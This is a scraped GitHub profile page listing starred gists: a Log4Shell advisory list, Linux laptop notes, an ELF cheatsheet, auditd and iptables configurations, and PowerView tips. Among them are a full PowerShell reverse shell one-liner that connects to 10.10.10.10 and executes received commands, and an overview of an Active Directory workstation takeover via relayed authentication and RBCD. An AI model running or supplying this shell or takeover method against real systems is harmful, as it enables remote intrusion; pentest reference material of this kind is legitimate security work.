Skip to content

Instantly share code, notes, and snippets.

View wynnchel's full-sized avatar

Wynnchel Duncan wynnchel

9 followers · 36 following
View GitHub Profile
@SwitHak
SwitHak / 20211210-TLP-WHITE_LOG4J.md
Last active February 7, 2025 23:49
BlueTeam CheatSheet * Log4Shell* | Last updated: 2021-12-20 2238 UTC

Security Advisories / Bulletins / vendors Responses linked to Log4Shell (CVE-2021-44228)

Errors, typos, something to say ?

  • If you want to add a link, comment or send it to me
  • Feel free to report any mistake directly below in the comment or in DM on Twitter @SwitHak

Other great resources

  • Royce Williams list sorted by vendors responses Royce List
  • Very detailed list NCSC-NL
  • The list maintained by U.S. Cybersecurity and Infrastructure Security Agency: CISA List
@linderd
linderd / README.md
Last active April 24, 2025 11:58 — forked from timlinux/README.md
Linux on Thinkpad P14s Gen2 AMD / T14 Gen2 AMD

Linux (Fedora 35) on a Thinkpad P14s [T14] Gen2 AMD

These are my installation-tricks and notes for running Linux on a 2021 Thinkpad P14s Gen2 with AMD Ryzen 7 5850U. It should also be suitable for the Thinkpad T14 Gen2 AMD as they are technically the same modell.
Meanwhile there is also a good test on youtube and an entry in the arch-wiki, which also comments some points mentioned here.

Detailed specs

Shipped:

@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active March 17, 2025 03:05
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@x0nu11byt3
x0nu11byt3 / elf_format_cheatsheet.md
Created February 27, 2021 05:26
ELF Format Cheatsheet

ELF Format Cheatsheet

Introduction

Executable and Linkable Format (ELF), is the default binary format on Linux-based systems.

ELF

Compilation

@3lpsy
3lpsy / x-resize
Last active March 27, 2025 03:24
Manual Implementation of Auto Resizing For Non-Gnome Environments (like XFCE) running under Spice/Libvirt
#!/bin/bash
# SPDX-License-Identifier: MIT License
# Steps:
# 1) Make sure bash is available
# 2) Create udev rule
# - path to new udev rule: /etc/udev/rules.d/50-x-resize.rules
# - udev rule content:
# ACTION=="change",KERNEL=="card0", SUBSYSTEM=="drm", RUN+="/usr/local/bin/x-resize"
# 3) Create /var/log/autores directory
# 4) Create script /usr/local/bin/x-resize (this file) and make executable
@ruanbekker
ruanbekker / tree_style_tab_firefox.md
Created November 28, 2019 06:18
Hide Native Tabs with Tree Style Tabs for Firefox
@egre55
egre55 / powershell_reverse_shell.ps1
Last active April 2, 2025 13:44
powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
@Neo23x0
Neo23x0 / audit.rules
Last active March 11, 2025 10:24
Linux Auditd Best Practice Configuration
# IMPORTANT!
# This gist has been transformed into a github repo
# You can find the most recent version there:
# https://github.com/Neo23x0/auditd
# ___ ___ __ __
# / | __ ______/ (_) /_____/ /
# / /| |/ / / / __ / / __/ __ /
# / ___ / /_/ / /_/ / / /_/ /_/ /
# /_/ |_\__,_/\__,_/_/\__/\__,_/
@HarmJ0y
HarmJ0y / PowerView-3.0-tricks.ps1
Last active April 23, 2025 13:20
PowerView-3.0 tips and tricks
# PowerView's last major overhaul is detailed here: http://www.harmj0y.net/blog/powershell/make-powerview-great-again/
# tricks for the 'old' PowerView are at https://gist.github.com/HarmJ0y/3328d954607d71362e3c
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
@Tristor
Tristor / iptables.sh
Last active April 13, 2025 10:11
Simple IPtables script for an OpenVPN server
#!/bin/bash
# Flushing all rules
iptables -F FORWARD
iptables -F INPUT
iptables -F OUTPUT
iptables -X
# Setting default filter policy
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP